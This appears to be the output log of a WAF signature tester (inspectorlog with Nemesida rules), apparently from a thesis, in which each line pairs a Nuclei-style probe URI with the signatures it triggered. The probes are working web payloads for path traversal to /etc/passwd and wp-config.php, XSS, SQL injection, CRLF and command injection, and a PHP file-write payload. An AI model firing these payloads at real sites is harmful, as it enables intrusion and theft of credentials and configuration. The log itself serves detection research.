# inspectorlog v3.5
#----- Initializing Rules (NEMESIDA)  ---------------------
#	Opening NEMESIDA rule file /home/kali/Downloads/reglas_javi/nemesida/nemesida-rules-bin-20220109.txt...
#		Rules: read [506], erroneous [0], URI (URL|ARGS) [449]
#-----  Statistics (NEMESIDA) ------------------------------
# Read [506] nemesida rules, [449] http-related, [0] with errors
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/kali/Downloads/inspectorlog/inspectorlog -l vulnerabilities.uri -m /home/kali/Downloads/reglas_javi/nemesida/nemesida-rules-bin-20220109.txt -t list -o /home/kali/TFG/inspectorlog/nemesida/web_estatica/owasp/opensource/nuclei/vulnerabilities.clean
Packet [1]	Uri [/web/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml]	Nattacks [2]	Signatures	[300000067]	[300001145]
Packet [3]	Uri [/web/guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E]	Nattacks [4]	Signatures	[300000515]	[300000537]	[300000550]	[300002793]
Packet [4]	Uri [/web/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=%2Fetc%2Fpasswd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [8]	Uri [/web/mdocs-posts/?mdocs-img-preview=../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [10]	Uri [/web/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [11]	Uri [/web/%20../web-inf/]	Nattacks [1]	Signatures	[300000067]
Packet [12]	Uri [/web/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [13]	Uri [/web/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [14]	Uri [/web/../../../../../../../../../../../../../etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [16]	Uri [/web/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini]	Nattacks [2]	Signatures	[300000057]	[300000071]
Packet [18]	Uri [/web/index.php?s=Admin-Data-down&id=../../Conf/config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [19]	Uri [/web/him/api/rest/V1.0/system/log/list?filePath=../]	Nattacks [2]	Signatures	[300000067]	[300001145]
Packet [28]	Uri [/web/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml]	Nattacks [2]	Signatures	[300000067]	[300001145]
Packet [30]	Uri [/web/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini]	Nattacks [1]	Signatures	[300001517]
Packet [33]	Uri [/web/guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E]	Nattacks [4]	Signatures	[300000515]	[300000537]	[300000550]	[300002793]
Packet [34]	Uri [/web/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=%2Fetc%2Fpasswd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [35]	Uri [/web/mdocs-posts/?mdocs-img-preview=../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [37]	Uri [/web/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [38]	Uri [/web/../../../../../../../../../../../../../etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [39]	Uri [/web/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [42]	Uri [/web/him/api/rest/V1.0/system/log/list?filePath=../]	Nattacks [2]	Signatures	[300000067]	[300001145]
Packet [45]	Uri [/web/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini]	Nattacks [2]	Signatures	[300000057]	[300000071]
Packet [46]	Uri [/web/index.php?s=Admin-Data-down&id=../../Conf/config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [49]	Uri [/web/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [50]	Uri [/web/%20../web-inf/]	Nattacks [1]	Signatures	[300000067]
Packet [51]	Uri [/web/wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [53]	Uri [/web/wt3/forceSave.php?file=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [60]	Uri [/web/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini]	Nattacks [1]	Signatures	[300001517]
Packet [61]	Uri [/web/?mdocs-img-preview=../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [63]	Uri [/web/plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [64]	Uri [/web/wt3/forceSave.php?file=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [66]	Uri [/web/wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E]	Nattacks [3]	Signatures	[300000052]	[300000528]	[300002793]
Packet [67]	Uri [/web/wp-content/uploads/affwp-debug.log]	Nattacks [1]	Signatures	[300001518]
Packet [70]	Uri [/web/plugins/weathermap/configs/poc.conf]	Nattacks [1]	Signatures	[300001517]
Packet [72]	Uri [/web/wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [74]	Uri [/web/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [77]	Uri [/web/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [78]	Uri [/web/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [81]	Uri [/web/topic/e'%22%3E%3Cimg%20src=x%20onerror=alert(2)%3E]	Nattacks [5]	Signatures	[300000052]	[300000502]	[300000508]	[300000516]	[300000528]
Packet [82]	Uri [/web/./../../../../../../../../../../windows/win.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001517]
Packet [90]	Uri [/web/download.php?file=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [92]	Uri [/web/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};alert(document.domain)//]	Nattacks [3]	Signatures	[300000051]	[300000508]	[300000550]
Packet [93]	Uri [/web/%3Cscript%3Ealert(document.domain)%3C/script%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [94]	Uri [/web/plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [95]	Uri [/web/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [96]	Uri [/web/wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E]	Nattacks [3]	Signatures	[300000052]	[300000528]	[300002793]
Packet [97]	Uri [/web/wp-content/uploads/affwp-debug.log]	Nattacks [1]	Signatures	[300001518]
Packet [98]	Uri [/web/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300001840]
Packet [101]	Uri [/web/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [103]	Uri [/web/plugins/weathermap/configs/poc.conf]	Nattacks [1]	Signatures	[300001517]
Packet [107]	Uri [/web/./../../../../../../../../../../windows/win.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001517]
Packet [108]	Uri [/web/topic/e'%22%3E%3Cimg%20src=x%20onerror=alert(2)%3E]	Nattacks [5]	Signatures	[300000052]	[300000502]	[300000508]	[300000516]	[300000528]
Packet [112]	Uri [/web/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [113]	Uri [/web/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [117]	Uri [/web/download.php?file=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [119]	Uri [/web/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};alert(document.domain)//]	Nattacks [3]	Signatures	[300000051]	[300000508]	[300000550]
Packet [120]	Uri [/web/%3Cscript%3Ealert(document.domain)%3C/script%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [123]	Uri [/web/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(1)]	Nattacks [3]	Signatures	[300000508]	[300001516]	[300001882]
Packet [124]	Uri [/web/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini]	Nattacks [1]	Signatures	[300001517]
Packet [127]	Uri [/web/yyoa/ext/https/getSessionList.jsp?cmd=getAll]	Nattacks [1]	Signatures	[300001516]
Packet [128]	Uri [/web/wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [130]	Uri [/web/password.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [133]	Uri [/web/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300001840]
Packet [134]	Uri [/web/index.php?s=/index/index/name/$%7B@phpinfo()%7D]	Nattacks [2]	Signatures	[300000037]	[300001871]
Packet [135]	Uri [/web/main/calendar/agenda_list.php?type=xss"+onmouseover=alert(document.domain)+"]	Nattacks [3]	Signatures	[300000508]	[300000532]	[300000550]
Packet [140]	Uri [/web/QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx]	Nattacks [1]	Signatures	[300001145]
Packet [142]	Uri [/web/guest_auth/poc.php?cmd=cat%20/etc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [144]	Uri [/web/Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [5]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]	[300001053]
Packet [145]	Uri [/web/./../../../../../../../../../../etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [146]	Uri [/web/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [147]	Uri [/web/images/..%2fapply_abstract.cgi]	Nattacks [2]	Signatures	[300000067]	[300001513]
Packet [149]	Uri [/web/eam/vib?id=/etc/issue]	Nattacks [1]	Signatures	[300002734]
Packet [153]	Uri [/web/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999)))]	Nattacks [4]	Signatures	[300001023]	[300001027]	[300002743]	[300002745]
Packet [154]	Uri [/web/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [155]	Uri [/web/wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E]=]	Nattacks [5]	Signatures	[300000502]	[300000508]	[300000516]	[300000528]	[300000550]
Packet [157]	Uri [/web/wp-content/themes/diarise/download.php?calendar=file:///etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300001840]
Packet [159]	Uri [/web/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)'']	Nattacks [2]	Signatures	[300000052]	[300002743]
Packet [160]	Uri [/web/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [162]	Uri [/web/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini]	Nattacks [1]	Signatures	[300001517]
Packet [163]	Uri [/web/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(1)]	Nattacks [3]	Signatures	[300000508]	[300001516]	[300001882]
Packet [164]	Uri [/web/yyoa/ext/https/getSessionList.jsp?cmd=getAll]	Nattacks [1]	Signatures	[300001516]
Packet [169]	Uri [/web/password.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [170]	Uri [/web/cfusion/debug/cf_debugFr.cfm?userPage=javascript:alert(1)]	Nattacks [3]	Signatures	[300000508]	[300001516]	[300001882]
Packet [171]	Uri [/web/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini]	Nattacks [3]	Signatures	[300000057]	[300000066]	[300001517]
Packet [173]	Uri [/web/index.php?s=/index/index/name/$%7B@phpinfo()%7D]	Nattacks [2]	Signatures	[300000037]	[300001871]
Packet [179]	Uri [/web/Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [5]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]	[300001053]
Packet [180]	Uri [/web/images/..%2fapply_abstract.cgi]	Nattacks [2]	Signatures	[300000067]	[300001513]
Packet [181]	Uri [/web/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [182]	Uri [/web/./../../../../../../../../../../etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [184]	Uri [/web/wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E]=]	Nattacks [5]	Signatures	[300000502]	[300000508]	[300000516]	[300000528]	[300000550]
Packet [185]	Uri [/web/wp-content/themes/diarise/download.php?calendar=file:///etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300001840]
Packet [186]	Uri [/web/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../tmp/]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [189]	Uri [/web/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [192]	Uri [/web/login.php/'%3E%3Csvg/onload=alert%6025SnmIcLC4GSscMcQ5BS8qEsUML%60%3E]	Nattacks [3]	Signatures	[300000052]	[300000508]	[300000528]
Packet [193]	Uri [/web/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [194]	Uri [/web/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999)))]	Nattacks [4]	Signatures	[300001023]	[300001027]	[300002743]	[300002745]
Packet [196]	Uri [/web/cgi-bin/login.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [198]	Uri [/web/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [202]	Uri [/web/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500]	Nattacks [2]	Signatures	[300001021]	[300001068]
Packet [204]	Uri [/web/include/thumb.php?dir=http/.....///.....///config/config_db.php]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [207]	Uri [/web/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini]	Nattacks [1]	Signatures	[300001517]
Packet [208]	Uri [/web/stat.jsp?cmd=chcp+437+%7c+dir]	Nattacks [1]	Signatures	[300001516]
Packet [209]	Uri [/web/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [210]	Uri [/web/wp-content/force-download.php?file=../wp-config.php]	Nattacks [2]	Signatures	[300000067]	[300001145]
Packet [212]	Uri [/web/include/thumb.php?dir=.....///http/.....///config/config_db.php]	Nattacks [1]	Signatures	[300000067]
Packet [213]	Uri [/web/index.php?a=fetch&content=%3C%3Fphp+file_put_contents%28%2225SnmJujIVh1aSQnDamnPs1WzFH.php%22%2C%22%3C%3Fphp+echo+phpinfo%28%29%3B%22%29%3B]	Nattacks [4]	Signatures	[300000051]	[300000053]	[300001313]	[300001871]
Packet [214]	Uri [/web/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [215]	Uri [/web/OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('25SnmKjtf5X54AnPR9KjAnYOCaj')%3E]	Nattacks [4]	Signatures	[300000052]	[300000053]	[300000508]	[300000528]
Packet [216]	Uri [/web/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [217]	Uri [/web/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [220]	Uri [/web/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [221]	Uri [/web/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [227]	Uri [/web/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b']	Nattacks [3]	Signatures	[300000052]	[300000068]	[300002743]
Packet [235]	Uri [/web/login.php/'%3E%3Csvg/onload=alert%6025SnmIcLC4GSscMcQ5BS8qEsUML%60%3E]	Nattacks [3]	Signatures	[300000052]	[300000508]	[300000528]
Packet [238]	Uri [/web/OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('25SnmKjtf5X54AnPR9KjAnYOCaj')%3E]	Nattacks [4]	Signatures	[300000052]	[300000053]	[300000508]	[300000528]
Packet [239]	Uri [/web/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500]	Nattacks [2]	Signatures	[300001021]	[300001068]
Packet [242]	Uri [/web/include/thumb.php?dir=.....///http/.....///config/config_db.php]	Nattacks [1]	Signatures	[300000067]
Packet [244]	Uri [/web/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [248]	Uri [/web/cgi-bin/login.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [250]	Uri [/web/index.php?a=fetch&content=%3C%3Fphp+file_put_contents%28%2225SnmJujIVh1aSQnDamnPs1WzFH.php%22%2C%22%3C%3Fphp+echo+phpinfo%28%29%3B%22%29%3B]	Nattacks [4]	Signatures	[300000051]	[300000053]	[300001313]	[300001871]
Packet [252]	Uri [/web/OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('25SnmKjtf5X54AnPR9KjAnYOCaj')%3E]	Nattacks [4]	Signatures	[300000052]	[300000053]	[300000508]	[300000528]
Packet [254]	Uri [/web/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini]	Nattacks [1]	Signatures	[300001517]
Packet [255]	Uri [/web/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [256]	Uri [/web/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [257]	Uri [/web/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [259]	Uri [/web/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27]	Nattacks [3]	Signatures	[300000051]	[300000052]	[300002743]
Packet [262]	Uri [/web/wp-content/plugins/.git/config]	Nattacks [1]	Signatures	[300001506]
Packet [263]	Uri [/web/include/thumb.php?dir=http\\..\\..\\config\\config_db.php]	Nattacks [2]	Signatures	[300000057]	[300000066]
Packet [268]	Uri [/web/fpui/jsp/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [269]	Uri [/web/?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E]	Nattacks [3]	Signatures	[300000052]	[300000528]	[300002793]
Packet [272]	Uri [/web/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001517]
Packet [276]	Uri [/web/wp-content/themes/.git/config]	Nattacks [1]	Signatures	[300001506]
Packet [277]	Uri [/web/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b']	Nattacks [3]	Signatures	[300000052]	[300000068]	[300002743]
Packet [278]	Uri [/web/OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('25SnmKjtf5X54AnPR9KjAnYOCaj')%3E]	Nattacks [4]	Signatures	[300000052]	[300000053]	[300000508]	[300000528]
Packet [282]	Uri [/web/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500]	Nattacks [2]	Signatures	[300001021]	[300001068]
Packet [288]	Uri [/web/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [290]	Uri [/web/download?type=files&filename=../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [291]	Uri [/web/%0ASet-Cookie:crlfinjection=crlfinjection]	Nattacks [1]	Signatures	[300001359]
Packet [295]	Uri [/web/fpui/jsp/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [297]	Uri [/web/?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E]	Nattacks [3]	Signatures	[300000052]	[300000528]	[300002793]
Packet [298]	Uri [/web/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [299]	Uri [/web/cgi-bin/operator/fileread?READ.filePath=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [302]	Uri [/web/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [306]	Uri [/web/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001517]
Packet [308]	Uri [/web/wp-content/themes/.git/config]	Nattacks [1]	Signatures	[300001506]
